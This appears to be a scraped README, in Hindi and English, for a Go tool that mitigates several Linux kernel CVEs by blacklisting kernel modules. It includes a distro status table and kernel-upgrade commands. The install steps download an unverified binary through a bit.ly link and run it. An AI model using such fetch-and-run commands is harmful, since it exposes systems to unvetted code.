
CVE-2026-46300 / CVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang हॉटफिक्स
b="/tmp/cve_2026_frag_family_fix"; wget -qO $b $(wget -qO- https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b
या
b="/tmp/cve_2026_frag_family_fix"; curl -fsSL "$(curl -fsSL https://bit.ly/4vetMTB | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b
esp4, esp6, rxrpc, act_pedit को अक्षम करता हैmodprobe के माध्यम से लोडिंग को अवरुद्ध करता हैmodule_blacklist जोड़ता हैesp4, esp6, rxrpc, act_pedit if notmodprobemodule_blacklist to grubयह उपकरण CVE-2026-31431 (पूर्व शर्त) की जाँच करता है और रूट विशेषाधिकार होने पर शमन लागू करता है:
algif_aead को अक्षम करता हैmodprobe के माध्यम से मॉड्यूल लोडिंग को अवरुद्ध करता हैinitcall_blacklist=algif_aead_init जोड़ता हैAF_ALG को प्रतिबंधित करता हैThis tool checks for CVE-2026-31431 (pre condition) and applies mitigation (requires root):
algif_aead if notmodprobeinitcall_blacklist=algif_aead_initAF_ALG via systemddocker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_frag_family_fix cve_2026_frag_family_fix.go && upx --best --ultra-brute cve_2026_frag_family_fix"
| OS | Copy Fail (CVE-2026-31431) | Dirty Frag (CVE-2026-43500/43284) | Fragnesia (CVE-2026-46300) | PEdit-CoW (CVE-2026-46331) |
|---|---|---|---|---|
| Debian 10 (buster) | ❌ | ❌ | ❌ | ❌ |
| Debian 11 (bullseye) | ✅ | ✅ | ✅ | ✅ |
| Debian 12 (bookworm) | ✅ | ✅ | ✅ | ✅ |
| Debian 13 (trixie) | ✅ | ✅ | ✅ | ✅ |
| Ubuntu 18.04 (bionic) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 20.04 (focal) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 22.04 (jammy) | ✅ | ❌ | ❌ | ❌ |
| Ubuntu 24.04 (noble) | ✅ | ✅ | ✅ | ❌ |
| Ubuntu 25.04 (plucky) | ❌ | ❌ | ❌ | ❌ |
| Ubuntu 26.04 (resolute) | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 8 | ❌ | ❌ | ❌ | ❌ |
| CentOS Stream 9 | ✅ | ✅ | ✅ | ✅ |
| CentOS Stream 10 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 8 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 9 | ✅ | ✅ | ✅ | ✅ |
| AlmaLinux 10 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Rocky Linux 10 | ✅ | ✅ | ✅ | ✅ |
| Fedora 40 | ❌ | ❌ | ❌ | ❌ |
| Fedora 41 | ❌ | ❌ | ❌ | ❌ |
| Fedora 42 | ✅ | ✅ | ✅ | ✅ |
| Fedora 43 | ✅ | ✅ | ✅ | ✅ |
| Fedora 44 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 8 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 9 | ✅ | ✅ | ✅ | ✅ |
| Oracle Linux 10 | ✅ | ✅ | ✅ | ✅ |
apt update && apt install linux-image-amd64 linux-headers-amd64 -yapt update && apt install linux-image-generic linux-headers-generic -ydnf clean metadata && dnf upgrade 'kernel*' -ydnf clean metadata && dnf upgrade 'kernel*' -ydnf clean metadata && dnf upgrade 'kernel*' -ydnf clean metadata && dnf upgrade 'kernel*' -ydnf clean metadata && dnf upgrade 'kernel*' -y